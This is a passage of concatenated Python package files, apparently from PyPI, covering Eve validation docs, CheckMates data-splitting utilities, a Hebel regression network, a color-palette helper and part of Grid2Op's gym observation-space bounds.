""" Enables validation for `objectid` schema attribute.
:param value: field value.
"""
if isinstance(value, ObjectId):
return True
This method enables support for MongoDB ``ObjectId`` type in your schema,
allowing something like this:
.. code-block:: python
'schema': {
'owner': {
'type': 'objectid',
'required': True,
},
}
You can also check the `source code`_ for Eve custom validation, where you will
find more advanced use cases, such as the implementation of the ``unique`` and
``data_relation`` constraints.
For more information on the available validation rules and data types, see the Cerberus_ documentation referenced below.
.. note::
We have only scratched the surface of data validation. Please make sure
to check the Cerberus_ documentation for a complete list of available
validation rules and data types.
Also note that Cerberus requirement is pinned to version 0.9.2, which still
supports the ``validate_update`` method used for ``PATCH`` requests.
Upgrade to Cerberus 1.0+ is scheduled for Eve version 0.8.
.. _unknown:
Allowing the Unknown
--------------------
Normally you don't want clients to inject unknown fields in your documents.
However, there might be circumstances where this is desirable. During the
development cycle, for example, or when you are dealing with very heterogeneous
data. After all, not forcing normalized information is one of the selling
points of MongoDB and many other NoSQL data stores.
In Eve, you achieve this by setting the ``ALLOW_UNKNOWN`` option to ``True``.
Once this option is enabled, fields matching the schema will be validated
normally, while unknown fields will be quietly stored without a glitch. You
can also enable this feature only for certain endpoints by setting the
``allow_unknown`` local option.
Consider the following domain:
.. code-block:: python
DOMAIN: {
'people': {
'allow_unknown': True,
'schema': {
'firstname': {'type': 'string'},
}
}
}
Normally you can only add (POST) or edit (PATCH) `firstnames` to the
``/people`` endpoint. However, since ``allow_unknown`` has been enabled, even
a payload like this will be accepted:
.. code-block:: console
$ curl -d '[{"firstname": "bill", "lastname": "clinton"}, {"firstname": "bill", "age":70}]' -H 'Content-Type: application/json' http://myapi/people
HTTP/1.1 201 OK
.. admonition:: Please note
Use this feature with extreme caution. Also be aware that, when this
option is enabled, clients will be capable of actually `adding` fields via
PATCH (edit).
``ALLOW_UNKNOWN`` is also useful for read-only APIs or endpoints that
need to return the whole document, as found in the underlying database. In this
scenario you don't want to bother with validation schemas. For the whole API
just set ``ALLOW_UNKNOWN`` to ``True``, then ``schema: {}`` at every endpoint.
For a single endpoint, use ``allow_unknown: True`` instead.
.. _schema_validation:
Schema validation
-----------------
By default, schemas are validated to ensure they conform to the structure
documented in :ref:`schema`.
In order to deal with non-conforming schemas, add
:ref:`custom_validation_rules` for non-conforming keys used in the schema.
.. _Cerberus: http://python-cerberus.org
.. _`source code`: https://github.com/pyeve/eve/blob/master/eve/io/mongo/validation.py
.. _`function-based validation`: http://docs.python-cerberus.org/en/latest/customize.html#function-validator
.. _`type coercion`: http://docs.python-cerberus.org/en/latest/usage.html#type-coercion
| PypiClean |
/CheckMates-0.2.0-py3-none-any.whl/checkmates/pipelines/utils.py | from typing import Union
import numpy as np
import pandas as pd
from sklearn.model_selection import ShuffleSplit, StratifiedShuffleSplit
from checkmates.data_checks import DataCheckActionCode
from checkmates.pipelines.components import ( # noqa: F401
DropColumns,
DropRowsTransformer,
PerColumnImputer,
TargetImputer,
TimeSeriesImputer,
TimeSeriesRegularizer,
)
from checkmates.pipelines.training_validation_split import TrainingValidationSplit
from checkmates.problem_types import is_classification, is_regression, is_time_series
from checkmates.utils import infer_feature_types
def _make_component_list_from_actions(actions):
    """Build the list of components needed to carry out the given actions.

    Args:
        actions (list(DataCheckAction)): DataCheckAction objects describing
            the cleaning steps to perform.

    Returns:
        list(ComponentBase): Components addressing the input actions.
    """
    result = []
    drop_cols = []
    drop_rows = []
    for act in actions:
        code = act.action_code
        if code == DataCheckActionCode.REGULARIZE_AND_IMPUTE_DATASET:
            params = act.metadata.get("parameters", {})
            result.append(
                TimeSeriesRegularizer(
                    time_index=params.get("time_index", None),
                    frequency_payload=params["frequency_payload"],
                )
            )
            result.append(TimeSeriesImputer())
        elif code == DataCheckActionCode.DROP_COL:
            drop_cols.extend(act.metadata["columns"])
        elif code == DataCheckActionCode.IMPUTE_COL:
            params = act.metadata.get("parameters", {})
            if act.metadata["is_target"]:
                result.append(
                    TargetImputer(impute_strategy=params["impute_strategy"])
                )
            else:
                result.append(
                    PerColumnImputer(impute_strategies=params["impute_strategies"])
                )
        elif code == DataCheckActionCode.DROP_ROWS:
            drop_rows.extend(act.metadata["rows"])
    # Column/row drops are accumulated across all actions, deduplicated, and
    # appended once at the end so each drop component runs a single time.
    if drop_cols:
        result.append(DropColumns(columns=sorted(set(drop_cols))))
    if drop_rows:
        result.append(DropRowsTransformer(indices_to_drop=sorted(set(drop_rows))))
    return result
def split_data(
    X,
    y,
    problem_type,
    problem_configuration=None,
    test_size=None,
    random_seed=0,
):
    """Split feature and target data into train and test sets.

    Time series problems are split in order (no shuffling), taking the test
    set from the end of the data; all other problem types use a shuffled
    split, stratified on ``y`` for classification.

    Args:
        X (pd.DataFrame or np.ndarray): Data of shape [n_samples, n_features].
        y (pd.Series or np.ndarray): Target data of length [n_samples].
        problem_type (str or ProblemTypes): Type of supervised learning problem.
            See evalml.problem_types.problemtype.all_problem_types for a full list.
        problem_configuration (dict): Additional parameters needed to configure
            the search. For example, in time series problems, values should be
            passed in for the time_index, gap, and max_delay variables.
        test_size (float): What percentage of data points should be included in
            the test set. Defaults to 0.2 (20%) for non-timeseries problems and
            0.1 (10%) for timeseries problems.
        random_seed (int): Seed for the random number generator. Defaults to 0.

    Returns:
        pd.DataFrame, pd.DataFrame, pd.Series, pd.Series: Feature and target
        data each split into train and test sets.
    """
    X = infer_feature_types(X)
    y = infer_feature_types(y)

    if is_time_series(problem_type):
        fraction = 0.1 if test_size is None else test_size
        # Ensure the test set is at least as long as the forecast horizon.
        if (
            problem_configuration is not None
            and "forecast_horizon" in problem_configuration
        ):
            horizon_fraction = problem_configuration["forecast_horizon"] / len(X)
            fraction = max(fraction, horizon_fraction)
        splitter = TrainingValidationSplit(
            test_size=fraction,
            shuffle=False,
            stratify=None,
            random_seed=random_seed,
        )
    else:
        fraction = 0.2 if test_size is None else test_size
        splitter = None
        if is_regression(problem_type):
            splitter = ShuffleSplit(
                n_splits=1,
                test_size=fraction,
                random_state=random_seed,
            )
        elif is_classification(problem_type):
            splitter = StratifiedShuffleSplit(
                n_splits=1,
                test_size=fraction,
                random_state=random_seed,
            )

    train_idx, test_idx = next(splitter.split(X, y))
    # Index through the woodwork accessor so typing information is preserved.
    X_train = X.ww.iloc[train_idx]
    X_test = X.ww.iloc[test_idx]
    y_train = y.ww.iloc[train_idx]
    y_test = y.ww.iloc[test_idx]
    return X_train, X_test, y_train, y_test
def drop_infinity(
    data: Union[pd.DataFrame, pd.Series],
) -> Union[pd.DataFrame, pd.Series]:
    """Replace positive and negative infinity values with NaN.

    Uses the woodwork (``ww``) accessor when the input has an initialized
    woodwork schema, so typing information is preserved; otherwise falls back
    to the plain pandas ``replace``.

    Args:
        data (pd.DataFrame or pd.Series): Data that may contain infinities.

    Returns:
        pd.DataFrame or pd.Series: Copy of ``data`` with +/-inf replaced by NaN.
    """
    try:
        use_ww = data.ww._schema is not None
    except AttributeError:
        # Generalization: plain pandas objects without the woodwork accessor
        # (previously an AttributeError) are handled via pandas directly.
        use_ww = False
    replace = data.ww.replace if use_ww else data.replace
    # Fix: the original return line carried stray dataset artifact text
    # ("| PypiClean") fused after the expression.
    return replace([np.inf, -np.inf], np.nan)
/Hebel-0.02.1.tar.gz/Hebel-0.02.1/hebel/models/neural_net_regression.py |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from .neural_net import NeuralNet
from ..layers import LinearRegressionLayer
class NeuralNetRegression(NeuralNet):
    """A neural network for regression using the squared error loss
    function.

    This class exists for convenience. The same results can be
    achieved by creating a :class:`hebel.models.NeuralNet` instance
    and passing a :class:`hebel.layers.LinearRegressionLayer` instance
    as the ``top_layer`` argument.

    **Parameters:**

    layers : array_like
        An array of either integers or instances of
        :class:`hebel.models.HiddenLayer` objects. If integers are
        given, they represent the number of hidden units in each layer
        and new ``HiddenLayer`` objects will be created. If
        ``HiddenLayer`` instances are given, the user must make sure
        that each ``HiddenLayer`` has ``n_in`` set to the preceding
        layer's ``n_units``. If ``HiddenLayer`` instances are passed,
        then ``activation_function``, ``dropout``, ``n_in``,
        ``l1_penalty_weight``, and ``l2_penalty_weight`` are ignored.

    top_layer : :class:`hebel.models.TopLayer` instance, optional
        If ``top_layer`` is given, then it is used for the output
        layer, otherwise, a ``LinearRegressionLayer`` instance is created.

    activation_function : {'sigmoid', 'tanh', 'relu', or 'linear'}, optional
        The activation function to be used in the hidden layers.

    dropout : bool, optional
        Whether to use dropout regularization

    n_in : integer, optional
        The dimensionality of the input. Must be given, if the first
        hidden layer is not passed as a
        :class:`hebel.models.HiddenLayer` instance.

    n_out : integer, optional
        The number of classes to predict from. Must be given, if a
        :class:`hebel.models.HiddenLayer` instance is not given in
        ``top_layer``.

    l1_penalty_weight : float, optional
        Weight for L1 regularization

    l2_penalty_weight : float, optional
        Weight for L2 regularization

    kwargs : optional
        Any additional arguments are passed on to ``top_layer``

    **See also:**
    :class:`hebel.models.NeuralNet`,
    :class:`hebel.models.MultitaskNeuralNet`,
    :class:`hebel.layers.LinearRegressionLayer`
    """

    # The only difference from ``NeuralNet`` is the default output layer
    # class, which makes the network minimize squared error.
    # (Fix: the original assignment line carried stray dataset artifact
    # text fused after the expression, which would raise at import time.)
    TopLayerClass = LinearRegressionLayer
/ColorfulData-1.0.2-py3-none-any.whl/ColorfulData_Package/ColorfulData.py | import numpy as np
from math import ceil,floor
class ColorfulData:
    """Create a custom, evenly distributed color palette.

    ``Get_Colors_Matched``: pairs each unique input value with a color.
    ``Get_Colors``: returns an evenly distributed selection of colors of the
    requested length.
    """

    @staticmethod
    def Get_Colors_Matched(items: list, colorPalette: list) -> np.ndarray:
        """Return a 2-d ndarray pairing each unique value of ``items`` (first
        column, sorted) with a color from ``colorPalette`` (second column).

        If ``colorPalette`` is larger than the number of unique items, the
        returned colors are equally spaced from start to end of the palette.
        If it is smaller, the palette is expanded by repeating colors and then
        equally spaced from start to end.
        """
        _items = np.unique(np.array(items))
        _colors = ColorfulData.Get_Colors(len(_items), colorPalette=colorPalette)
        return np.column_stack([np.array(_items), _colors])

    @staticmethod
    def Get_Colors(count: int, colorPalette: list) -> np.ndarray:
        """Return ``count`` colors drawn from ``colorPalette``.

        If the palette (after expansion) is larger than ``count``, returned
        values are picked equally spaced from start to end; otherwise the
        first ``count`` entries of the expanded palette are returned.

        NOTE(review): ``np.repeat`` repeats each color consecutively
        (r, r, g, g) rather than cycling through the palette (r, g, r, g).
        If cycling order is intended, ``np.tile`` would be needed; left
        unchanged here to preserve the existing output.
        """
        _paletteCount = len(colorPalette)
        _colorsCount = count
        # Expand the palette so it is at least ``count`` entries long.
        _repeat = ceil(_colorsCount / _paletteCount)
        _colorsIn = np.repeat(np.array(colorPalette), _repeat)
        _remainder = len(_colorsIn) - _colorsCount
        # Number of entries to skip between picks when the expanded palette
        # is much larger than the requested count.
        _skip = floor(_remainder / _colorsCount)
        if _skip > 0:
            _index = np.arange(
                start=0, stop=_paletteCount, step=_skip if _skip > 1 else 1
            )
            _colorIndex = [_colorsIn[x] for x in _index][:_colorsCount]
        else:
            _colorIndex = _colorsIn[:_colorsCount]
        # Fixes vs. original: removed leftover debug ``print('')`` and
        # commented-out diagnostics; removed stray dataset artifact text
        # that was fused onto the return line.
        return _colorIndex
/Grid2Op-1.9.3-py3-none-any.whl/grid2op/gym_compat/box_gym_obsspace.py |
from typing import Tuple
import copy
import warnings
import numpy as np
from grid2op.dtypes import dt_int, dt_bool, dt_float
from grid2op.Observation import ObservationSpace
from grid2op.Exceptions import Grid2OpException
from grid2op.gym_compat.utils import (_compute_extra_power_for_losses,
GYM_AVAILABLE,
GYMNASIUM_AVAILABLE,
check_gym_version)
ALL_ATTR_OBS = (
"year",
"month",
"day",
"hour_of_day",
"minute_of_hour",
"day_of_week",
"gen_p",
"gen_p_before_curtail",
"gen_q",
"gen_v",
"gen_margin_up",
"gen_margin_down",
"load_p",
"load_q",
"load_v",
"p_or",
"q_or",
"v_or",
"a_or",
"p_ex",
"q_ex",
"v_ex",
"a_ex",
"rho",
"line_status",
"timestep_overflow",
"topo_vect",
"time_before_cooldown_line",
"time_before_cooldown_sub",
"time_next_maintenance",
"duration_next_maintenance",
"target_dispatch",
"actual_dispatch",
"storage_charge",
"storage_power_target",
"storage_power",
"curtailment",
"curtailment_limit",
"curtailment_limit_effective",
"thermal_limit",
"is_alarm_illegal",
"time_since_last_alarm",
"last_alarm",
"attention_budget",
"was_alarm_used_after_game_over",
"max_step",
"active_alert",
"attack_under_alert",
"time_since_last_alert",
"alert_duration",
"total_number_of_alert",
"time_since_last_attack",
"was_alert_used_after_attack",
"theta_or",
"theta_ex",
"load_theta",
"gen_theta",
)
# TODO add the alarm stuff
# TODO add the time step
# TODO add the is_illegal and co there
class __AuxBoxGymObsSpace:
"""
This class allows to convert a grid2op observation space into a gym "Box" which is
a regular Box in R^d.
It also allows to customize which part of the observation you want to use and offer capacity to
center / reduce the data or to use more complex function from the observation.
.. warning::
Depending on the presence absence of gymnasium and gym packages this class might behave differently.
In grid2op we tried to maintain compatibility both with gymnasium (newest) and gym (legacy,
no more maintained) RL packages. The behaviour is the following:
- :class:`BoxGymObsSpace` will inherit from gymnasium if it's installed
(in this case it will be :class:`BoxGymnasiumObsSpace`), otherwise it will
inherit from gym (and will be exactly :class:`BoxLegacyGymObsSpace`)
- :class:`BoxGymnasiumObsSpace` will inherit from gymnasium if it's available and never from
from gym
- :class:`BoxLegacyGymObsSpace` will inherit from gym if it's available and never from
from gymnasium
See :ref:`gymnasium_gym` for more information
.. note::
A gymnasium Box is encoded as a numpy array.
Examples
--------
If you simply want to use it you can do:
.. code-block:: python
import grid2op
env_name = "l2rpn_case14_sandbox" # or any other name
env = grid2op.make(env_name)
from grid2op.gym_compat import GymEnv, BoxGymObsSpace
gym_env = GymEnv(env)
gym_env.observation_space = BoxGymObsSpace(env.observation_space)
In this case it will extract all the features in all the observation (a detailed list is given
in the documentation at :ref:`observation_module`.
You can select the attribute you want to keep, for example:
.. code-block:: python
gym_env.observation_space = BoxGymObsSpace(env.observation_space,
attr_to_keep=['load_p', "gen_p", "rho])
You can also apply some basic transformation to the attribute of the observation before building
the resulting gym observation (which in this case is a vector). This can be done with:
.. code-block:: python
gym_env.observation_space = BoxGymObsSpace(env.observation_space,
attr_to_keep=['load_p', "gen_p", "rho"],
divide={"gen_p": env.gen_pmax},
substract={"gen_p": 0.5 * env.gen_pmax})
In the above example, the resulting "gen_p" part of the vector will be given by the following
formula: `gym_obs = (grid2op_obs - substract) / divide`.
Hint: you can use: divide being the standard deviation and subtract being the average of the attribute
on a few episodes for example. This can be done with :class:`grid2op.utils.EpisodeStatistics` for example.
Finally, you can also modify more the attribute of the observation and add it to your box. This
can be done rather easily with the "functs" argument like:
.. code-block:: python
gym_env.observation_space = BoxGymObsSpace(env.observation_space,
attr_to_keep=["connectivity_matrix", "log_load"],
functs={"connectivity_matrix":
(lambda grid2opobs: grid2opobs.connectivity_matrix().flatten(),
0., 1.0, None, None),
"log_load":
(lambda grid2opobs: np.log(grid2opobs.load_p),
None, 10., None, None)
}
)
In this case, "functs" should be a dictionary, the "keys" should be string (keys should also be
present in the `attr_to_keep` list) and the values should count 5 elements
(callable, low, high, shape, dtype) with:
- `callable` a function taking as input a grid2op observation and returning a numpy array
- `low` (optional) (put None if you don't want to specify it, defaults to `-np.inf`) the lowest value
your numpy array can take. It can be a single number or an array with the same shape
as the return value of your function.
- `high` (optional) (put None if you don't want to specify it, defaults to `np.inf`) the highest value
your numpy array can take. It can be a single number or an array with the same shape
as the return value of your function.
- `shape` (optional) (put None if you don't want to specify it) the shape of the return value
of your function. It should be a tuple (and not a single number). By default it is computed
with by applying your function to an observation.
- `dtype` (optional, put None if you don't want to change it, defaults to np.float32) the type of
the numpy array as output of your function.
Notes
-----
The range of the values for "gen_p" / "prod_p" are not strictly `env.gen_pmin` and `env.gen_pmax`.
This is due to the "approximation" when some redispatching is performed (the precision of the
algorithm that computes the actual dispatch from the information it receives) and also because
sometimes the losses of the grid are really different that the one anticipated in the "chronics" (yes
env.gen_pmin and env.gen_pmax are not always ensured in grid2op)
"""
    def __init__(
        self,
        grid2op_observation_space,
        attr_to_keep=ALL_ATTR_OBS,
        subtract=None,
        divide=None,
        functs=None,
    ):
        """Build a gym/gymnasium ``Box`` view of a grid2op observation space.

        Parameters
        ----------
        grid2op_observation_space:
            The grid2op :class:`ObservationSpace` to convert.
        attr_to_keep:
            Names of the observation attributes concatenated (in sorted
            order) into the resulting Box vector.
        subtract:
            Optional dict ``attr name -> value`` subtracted from the
            attribute before it is put in the vector.
        divide:
            Optional dict ``attr name -> value`` the attribute is divided by
            (after ``subtract``) before it is put in the vector.
        functs:
            Optional dict ``attr name -> (callable, low, high, shape, dtype)``
            describing custom encodings (see the class documentation).
        """
        check_gym_version(type(self)._gymnasium)
        if not isinstance(grid2op_observation_space, ObservationSpace):
            raise RuntimeError(
                f"Impossible to create a BoxGymObsSpace without providing a "
                f"grid2op observation. You provided {type(grid2op_observation_space)}"
                f'as the "grid2op_observation_space" attribute.'
            )
        # attributes are always stored (and concatenated) in sorted order
        self._attr_to_keep = sorted(attr_to_keep)
        ob_sp = grid2op_observation_space
        tol_redisp = (
            ob_sp.obs_env._tol_poly
        )  # add to gen_p otherwise ... well it can crash
        extra_for_losses = _compute_extra_power_for_losses(ob_sp)
        # mapping: attribute name -> (low, high, shape, dtype) of its slice
        # in the final Box vector
        self._dict_properties = {
            # --- calendar / time attributes ---
            "year": (
                np.zeros(1, dtype=dt_int),
                np.zeros(1, dtype=dt_int) + 2200,
                (1,),
                dt_int,
            ),
            "month": (
                np.zeros(1, dtype=dt_int),
                np.zeros(1, dtype=dt_int) + 12,
                (1,),
                dt_int,
            ),
            "day": (
                np.zeros(1, dtype=dt_int),
                np.zeros(1, dtype=dt_int) + 31,
                (1,),
                dt_int,
            ),
            "hour_of_day": (
                np.zeros(1, dtype=dt_int),
                np.zeros(1, dtype=dt_int) + 24,
                (1,),
                dt_int,
            ),
            "minute_of_hour": (
                np.zeros(1, dtype=dt_int),
                np.zeros(1, dtype=dt_int) + 60,
                (1,),
                dt_int,
            ),
            "day_of_week": (
                np.zeros(1, dtype=dt_int),
                np.zeros(1, dtype=dt_int) + 7,
                (1,),
                dt_int,
            ),
            "current_step": (
                np.zeros(1, dtype=dt_int),
                np.zeros(1, dtype=dt_int) + np.iinfo(dt_int).max,
                (1,),
                dt_int,
            ),
            # --- generator attributes ---
            # gen_p bounds are widened by the redispatch tolerance and the
            # loss margin (see the class-level Notes section)
            "gen_p": (
                np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float)
                - tol_redisp
                - extra_for_losses,
                ob_sp.gen_pmax + tol_redisp + extra_for_losses,
                (ob_sp.n_gen,),
                dt_float,
            ),
            "gen_q": (
                np.full(shape=(ob_sp.n_gen,), fill_value=-np.inf, dtype=dt_float),
                np.full(shape=(ob_sp.n_gen,), fill_value=np.inf, dtype=dt_float),
                (ob_sp.n_gen,),
                dt_float,
            ),
            "gen_v": (
                np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
                np.full(shape=(ob_sp.n_gen,), fill_value=np.inf, dtype=dt_float),
                (ob_sp.n_gen,),
                dt_float,
            ),
            "gen_margin_up": (
                np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
                1.0 * ob_sp.gen_max_ramp_up,
                (ob_sp.n_gen,),
                dt_float,
            ),
            "gen_margin_down": (
                np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
                1.0 * ob_sp.gen_max_ramp_down,
                (ob_sp.n_gen,),
                dt_float,
            ),
            "gen_theta": (
                np.full(shape=(ob_sp.n_gen,), fill_value=-180., dtype=dt_float),
                np.full(shape=(ob_sp.n_gen,), fill_value=180., dtype=dt_float),
                (ob_sp.n_gen,),
                dt_float,
            ),
            # --- load attributes ---
            "load_p": (
                np.full(shape=(ob_sp.n_load,), fill_value=-np.inf, dtype=dt_float),
                np.full(shape=(ob_sp.n_load,), fill_value=+np.inf, dtype=dt_float),
                (ob_sp.n_load,),
                dt_float,
            ),
            "load_q": (
                np.full(shape=(ob_sp.n_load,), fill_value=-np.inf, dtype=dt_float),
                np.full(shape=(ob_sp.n_load,), fill_value=+np.inf, dtype=dt_float),
                (ob_sp.n_load,),
                dt_float,
            ),
            "load_v": (
                np.full(shape=(ob_sp.n_load,), fill_value=0.0, dtype=dt_float),
                np.full(shape=(ob_sp.n_load,), fill_value=np.inf, dtype=dt_float),
                (ob_sp.n_load,),
                dt_float,
            ),
            "load_theta": (
                np.full(shape=(ob_sp.n_load,), fill_value=-180., dtype=dt_float),
                np.full(shape=(ob_sp.n_load,), fill_value=180., dtype=dt_float),
                (ob_sp.n_load,),
                dt_float,
            ),
            # --- powerline attributes ("or" = origin side, "ex" = extremity) ---
            "p_or": (
                np.full(shape=(ob_sp.n_line,), fill_value=-np.inf, dtype=dt_float),
                np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
                (ob_sp.n_line,),
                dt_float,
            ),
            "q_or": (
                np.full(shape=(ob_sp.n_line,), fill_value=-np.inf, dtype=dt_float),
                np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
                (ob_sp.n_line,),
                dt_float,
            ),
            "a_or": (
                np.full(shape=(ob_sp.n_line,), fill_value=0.0, dtype=dt_float),
                np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
                (ob_sp.n_line,),
                dt_float,
            ),
            "v_or": (
                np.full(shape=(ob_sp.n_line,), fill_value=0.0, dtype=dt_float),
                np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
                (ob_sp.n_line,),
                dt_float,
            ),
            "theta_or": (
                np.full(shape=(ob_sp.n_line,), fill_value=-180., dtype=dt_float),
                np.full(shape=(ob_sp.n_line,), fill_value=180., dtype=dt_float),
                (ob_sp.n_line,),
                dt_float,
            ),
            "p_ex": (
                np.full(shape=(ob_sp.n_line,), fill_value=-np.inf, dtype=dt_float),
                np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
                (ob_sp.n_line,),
                dt_float,
            ),
            "q_ex": (
                np.full(shape=(ob_sp.n_line,), fill_value=-np.inf, dtype=dt_float),
                np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
                (ob_sp.n_line,),
                dt_float,
            ),
            "a_ex": (
                np.full(shape=(ob_sp.n_line,), fill_value=0.0, dtype=dt_float),
                np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
                (ob_sp.n_line,),
                dt_float,
            ),
            "v_ex": (
                np.full(shape=(ob_sp.n_line,), fill_value=0.0, dtype=dt_float),
                np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
                (ob_sp.n_line,),
                dt_float,
            ),
            "theta_ex": (
                np.full(shape=(ob_sp.n_line,), fill_value=-180., dtype=dt_float),
                np.full(shape=(ob_sp.n_line,), fill_value=180., dtype=dt_float),
                (ob_sp.n_line,),
                dt_float,
            ),
            "rho": (
                np.full(shape=(ob_sp.n_line,), fill_value=0.0, dtype=dt_float),
                np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
                (ob_sp.n_line,),
                dt_float,
            ),
            "line_status": (
                np.full(shape=(ob_sp.n_line,), fill_value=0, dtype=dt_int),
                np.full(shape=(ob_sp.n_line,), fill_value=1, dtype=dt_int),
                (ob_sp.n_line,),
                dt_int,
            ),
            "timestep_overflow": (
                np.full(
                    shape=(ob_sp.n_line,), fill_value=np.iinfo(dt_int).min, dtype=dt_int
                ),
                np.full(
                    shape=(ob_sp.n_line,), fill_value=np.iinfo(dt_int).max, dtype=dt_int
                ),
                (ob_sp.n_line,),
                dt_int,
            ),
            # --- topology / maintenance attributes ---
            # topo_vect values: -1 (disconnected), 1 or 2 (busbar id)
            "topo_vect": (
                np.full(shape=(ob_sp.dim_topo,), fill_value=-1, dtype=dt_int),
                np.full(shape=(ob_sp.dim_topo,), fill_value=2, dtype=dt_int),
                (ob_sp.dim_topo,),
                dt_int,
            ),
            "time_before_cooldown_line": (
                np.full(shape=(ob_sp.n_line,), fill_value=0, dtype=dt_int),
                np.full(
                    shape=(ob_sp.n_line,), fill_value=np.iinfo(dt_int).max, dtype=dt_int
                ),
                (ob_sp.n_line,),
                dt_int,
            ),
            "time_before_cooldown_sub": (
                np.full(shape=(ob_sp.n_sub,), fill_value=0, dtype=dt_int),
                np.full(
                    shape=(ob_sp.n_sub,), fill_value=np.iinfo(dt_int).max, dtype=dt_int
                ),
                (ob_sp.n_sub,),
                dt_int,
            ),
            "time_next_maintenance": (
                np.full(shape=(ob_sp.n_line,), fill_value=-1, dtype=dt_int),
                np.full(
                    shape=(ob_sp.n_line,), fill_value=np.iinfo(dt_int).max, dtype=dt_int
                ),
                (ob_sp.n_line,),
                dt_int,
            ),
            "duration_next_maintenance": (
                np.full(shape=(ob_sp.n_line,), fill_value=0, dtype=dt_int),
                np.full(
                    shape=(ob_sp.n_line,), fill_value=np.iinfo(dt_int).max, dtype=dt_int
                ),
                (ob_sp.n_line,),
                dt_int,
            ),
            # --- redispatching / storage / curtailment attributes ---
            "target_dispatch": (
                np.minimum(ob_sp.gen_pmin, -ob_sp.gen_pmax),
                np.maximum(-ob_sp.gen_pmin, +ob_sp.gen_pmax),
                (ob_sp.n_gen,),
                dt_float,
            ),
            "actual_dispatch": (
                np.minimum(ob_sp.gen_pmin, -ob_sp.gen_pmax),
                np.maximum(-ob_sp.gen_pmin, +ob_sp.gen_pmax),
                (ob_sp.n_gen,),
                dt_float,
            ),
            "storage_charge": (
                np.full(shape=(ob_sp.n_storage,), fill_value=0, dtype=dt_float),
                1.0 * ob_sp.storage_Emax,
                (ob_sp.n_storage,),
                dt_float,
            ),
            "storage_power_target": (
                -1.0 * ob_sp.storage_max_p_prod,
                1.0 * ob_sp.storage_max_p_absorb,
                (ob_sp.n_storage,),
                dt_float,
            ),
            "storage_power": (
                -1.0 * ob_sp.storage_max_p_prod,
                1.0 * ob_sp.storage_max_p_absorb,
                (ob_sp.n_storage,),
                dt_float,
            ),
            "storage_theta": (
                np.full(shape=(ob_sp.n_storage,), fill_value=-180., dtype=dt_float),
                np.full(shape=(ob_sp.n_storage,), fill_value=180., dtype=dt_float),
                (ob_sp.n_storage,),
                dt_float,
            ),
            "curtailment": (
                np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
                np.full(shape=(ob_sp.n_gen,), fill_value=1.0, dtype=dt_float),
                (ob_sp.n_gen,),
                dt_float,
            ),
            "curtailment_limit": (
                np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
                np.full(shape=(ob_sp.n_gen,), fill_value=1.0, dtype=dt_float),
                (ob_sp.n_gen,),
                dt_float,
            ),
            "curtailment_mw": (
                np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
                1.0 * ob_sp.gen_pmax,
                (ob_sp.n_gen,),
                dt_float,
            ),
            "curtailment_limit_mw": (
                np.full(shape=(ob_sp.n_gen,), fill_value=0.0, dtype=dt_float),
                1.0 * ob_sp.gen_pmax,
                (ob_sp.n_gen,),
                dt_float,
            ),
            "thermal_limit": (
                np.full(shape=(ob_sp.n_line,), fill_value=0.0, dtype=dt_float),
                np.full(shape=(ob_sp.n_line,), fill_value=np.inf, dtype=dt_float),
                (ob_sp.n_line,),
                dt_float,
            ),
            # --- alarm attributes ---
            "is_alarm_illegal": (
                np.full(shape=(1,), fill_value=False, dtype=dt_bool),
                np.full(shape=(1,), fill_value=True, dtype=dt_bool),
                (1,),
                dt_bool,
            ),
            "time_since_last_alarm": (
                np.full(shape=(1,), fill_value=-1, dtype=dt_int),
                np.full(shape=(1,), fill_value=np.iinfo(dt_int).max, dtype=dt_int),
                (1,),
                dt_int,
            ),
            "last_alarm": (
                np.full(shape=(ob_sp.dim_alarms,), fill_value=-1, dtype=dt_int),
                np.full(
                    shape=(ob_sp.dim_alarms,),
                    fill_value=np.iinfo(dt_int).max,
                    dtype=dt_int,
                ),
                (ob_sp.dim_alarms,),
                dt_int,
            ),
            "attention_budget": (
                np.full(shape=(1,), fill_value=-1, dtype=dt_float),
                np.full(shape=(1,), fill_value=np.inf, dtype=dt_float),
                (1,),
                dt_float,
            ),
            "was_alarm_used_after_game_over": (
                np.full(shape=(1,), fill_value=False, dtype=dt_bool),
                np.full(shape=(1,), fill_value=True, dtype=dt_bool),
                (1,),
                dt_bool,
            ),
            "delta_time": (
                np.full(shape=(1,), fill_value=0, dtype=dt_float),
                np.full(shape=(1,), fill_value=np.inf, dtype=dt_float),
                (1,),
                dt_float,
            ),
            # alert stuff
            "active_alert": (
                np.full(shape=(ob_sp.dim_alerts,), fill_value=False, dtype=dt_bool),
                np.full(shape=(ob_sp.dim_alerts,), fill_value=True, dtype=dt_bool),
                (ob_sp.dim_alerts,),
                dt_bool,
            ),
            "time_since_last_alert": (
                np.full(shape=(ob_sp.dim_alerts,), fill_value=-1, dtype=dt_int),
                np.full(shape=(ob_sp.dim_alerts,), fill_value=np.iinfo(dt_int).max, dtype=dt_int),
                (ob_sp.dim_alerts,),
                dt_int,
            ),
            "alert_duration": (
